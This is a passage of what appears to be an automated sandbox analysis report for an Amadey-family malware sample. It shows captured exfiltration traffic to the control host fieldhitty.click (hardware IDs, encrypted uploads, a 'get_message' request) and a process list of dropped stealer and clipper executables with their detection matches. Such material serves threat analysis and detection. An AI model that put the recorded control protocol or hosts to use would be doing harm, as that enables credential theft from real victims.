                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5w%2F5dy47XhIBCVYER3rfADxE64u6ej%2FIJne8%2FM68xJRHF3IcefPYFJ0A%2FHY00Z%2FnvENHXQg3TWp3AKtLgnhykVVHFe4t%2FdYpclubLR%2FWl7I%2FH%2FICPUxuFDSNiMYE9FoS7avT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4e249b42c33f-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1597&rtt_var=610&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2243&delivery_rate=1779402&cwnd=235&unsent_bytes=0&cid=25b8d0d24ed80712&ts=780&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:23:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:23:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              95192.168.2.450636104.21.89.115443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:23:14 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=OZ4DZWB5
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 29501
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:23:14 UTC15331OUTData Raw: 2d 2d 4f 5a 34 44 5a 57 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4f 5a 34 44 5a 57 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 5a 34 44 5a 57 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 4f 5a 34 44 5a 57 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20
                                                                                                                                                                                                                                                              Data Ascii: --OZ4DZWB5Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--OZ4DZWB5Content-Disposition: form-data; name="pid"1--OZ4DZWB5Content-Disposition: form-data; name="lid"PvbArZ----OZ4DZWB5Content-Disposition:
                                                                                                                                                                                                                                                              2024-12-22 01:23:14 UTC14170OUTData Raw: d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f 15 6f 5e 8a 52 eb 8f 3d 5a b5 1b 48 4d 79 64 30 cc 8f f2 84 31 cb 5f 31 6d fe 58 5d 72 1b 54 9a b4 da cf af 82 84 7b 17 55 3b cb 03 b6 af 9b a8 f5 ad 74 ab 91 ef 75 c2 46 bc 57 3f fb b6
                                                                                                                                                                                                                                                              Data Ascii: 5OEK?6V,i<0egW\ro`#R\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_|x5mDom;z/o^R=ZHMyd01_1mX]rT{U;tuFW?
                                                                                                                                                                                                                                                              2024-12-22 01:23:15 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:23:15 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=1siplhe6en9n78iv3leev9u3bn; expires=Wed, 16 Apr 2025 19:09:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QTYapNTbSIfICoA4u%2BE%2B%2FYG5bA12Z%2BfaYx2MkhSKvT2C7UEr7YZ3HD2ZwR6KPHQJspdKJogxMhx1DykXkhUeWHp3UQZpAw3JHKse8cpR%2FL12EnGJZDDXi4CLkpuG8R2z%2B4MO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4e3218dc9e08-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1845&min_rtt=1834&rtt_var=711&sent=19&recv=34&lost=0&retrans=0&sent_bytes=2838&recv_bytes=30475&delivery_rate=1515308&cwnd=163&unsent_bytes=0&cid=1d48780d703afb57&ts=969&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:23:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:23:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              96192.168.2.450639104.21.89.115443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:23:16 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 77
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:23:16 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 76 62 41 72 5a 2d 2d 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=PvbArZ--&j=&hwid=F14195A540BC0B98AC8923850305D13E
                                                                                                                                                                                                                                                              2024-12-22 01:23:17 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:23:17 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=8sk20ov9mtiahk7kk1bt40720p; expires=Wed, 16 Apr 2025 19:09:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mBCAULZ6tdmE5DROY0AzKcuvbdsXZczqAGKibE4ZkaqQUIseixbpnbGcNJcjlrrA%2Bz1DpFKv0iBNZEetlXCT5bn2c1E2%2FhvlOiYFCyJ9ajvU0y5QX9jreJbFUaJ6sS3f%2FRM%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4e408e241849-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1480&rtt_var=577&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=977&delivery_rate=1859872&cwnd=180&unsent_bytes=0&cid=b519b22b5e7e3201&ts=792&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:23:17 UTC54INData Raw: 33 30 0d 0a 69 47 76 48 50 61 2b 70 59 56 5a 63 38 75 75 54 35 68 6a 74 33 51 4b 43 4a 47 72 2b 6f 70 63 4a 76 33 6e 69 30 78 76 6a 6f 42 6e 54 4e 67 3d 3d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 30iGvHPa+pYVZc8uuT5hjt3QKCJGr+opcJv3ni0xvjoBnTNg==
                                                                                                                                                                                                                                                              2024-12-22 01:23:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:20:15:00
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                              Imagebase:0x850000
                                                                                                                                                                                                                                                              File size:3'263'488 bytes
                                                                                                                                                                                                                                                              MD5 hash:CF6393E173FB6315D0C681BC78EB3528
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                              Start time:20:15:04
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                              Imagebase:0x9a0000
                                                                                                                                                                                                                                                              File size:3'263'488 bytes
                                                                                                                                                                                                                                                              MD5 hash:CF6393E173FB6315D0C681BC78EB3528
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                              Start time:20:16:00
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              Imagebase:0x9a0000
                                                                                                                                                                                                                                                              File size:3'263'488 bytes
                                                                                                                                                                                                                                                              MD5 hash:CF6393E173FB6315D0C681BC78EB3528
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                              Start time:20:16:15
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe"
                                                                                                                                                                                                                                                              Imagebase:0xc0000
                                                                                                                                                                                                                                                              File size:2'668'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:87330F1877C33A5A6203C49075223B16
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 22%, ReversingLabs
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                                              Start time:20:16:22
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"
                                                                                                                                                                                                                                                              Imagebase:0x330000
                                                                                                                                                                                                                                                              File size:776'832 bytes
                                                                                                                                                                                                                                                              MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 68%, ReversingLabs
                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                              Start time:20:16:22
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                              Start time:20:16:25
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"
                                                                                                                                                                                                                                                              Imagebase:0x330000
                                                                                                                                                                                                                                                              File size:776'832 bytes
                                                                                                                                                                                                                                                              MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                              Start time:20:16:25
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"
                                                                                                                                                                                                                                                              Imagebase:0x330000
                                                                                                                                                                                                                                                              File size:776'832 bytes
                                                                                                                                                                                                                                                              MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2690845654.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2690960983.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                              Start time:20:16:30
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe"
                                                                                                                                                                                                                                                              Imagebase:0xf70000
                                                                                                                                                                                                                                                              File size:1'861'632 bytes
                                                                                                                                                                                                                                                              MD5 hash:15709EBA2AFAF7CC0A86CE0ABF8E53F1
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2773819917.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2773670606.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2774094257.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2773960939.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 47%, ReversingLabs
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                              Start time:20:16:37
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe"
                                                                                                                                                                                                                                                              Imagebase:0x530000
                                                                                                                                                                                                                                                              File size:439'296 bytes
                                                                                                                                                                                                                                                              MD5 hash:51FF79B406CB223DD49DD4C947EC97B0
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe, Author: Joe Security
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 55%, ReversingLabs
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                                              Start time:20:16:38
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
                                                                                                                                                                                                                                                              Imagebase:0xaa0000
                                                                                                                                                                                                                                                              File size:439'296 bytes
                                                                                                                                                                                                                                                              MD5 hash:51FF79B406CB223DD49DD4C947EC97B0
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe, Author: Joe Security
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 55%, ReversingLabs
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                              Start time:20:16:39
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              Imagebase:0xaa0000
                                                                                                                                                                                                                                                              File size:439'296 bytes
                                                                                                                                                                                                                                                              MD5 hash:51FF79B406CB223DD49DD4C947EC97B0
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                              Start time:20:16:44
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff7358f0000
                                                                                                                                                                                                                                                              File size:605'696 bytes
                                                                                                                                                                                                                                                              MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                              Start time:20:16:45
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              Imagebase:0x7ff7358f0000
                                                                                                                                                                                                                                                              File size:605'696 bytes
                                                                                                                                                                                                                                                              MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                                              Start time:20:16:55
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff70ef80000
                                                                                                                                                                                                                                                              File size:251'392 bytes
                                                                                                                                                                                                                                                              MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                              Start time:20:16:56
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe"
                                                                                                                                                                                                                                                              Imagebase:0x580000
                                                                                                                                                                                                                                                              File size:4'470'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:A42B5A11FB98E17DCA2EA358EAC541DE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                              Start time:20:16:58
                                                                                                                                                                                                                                                              Start date:21/12/2024
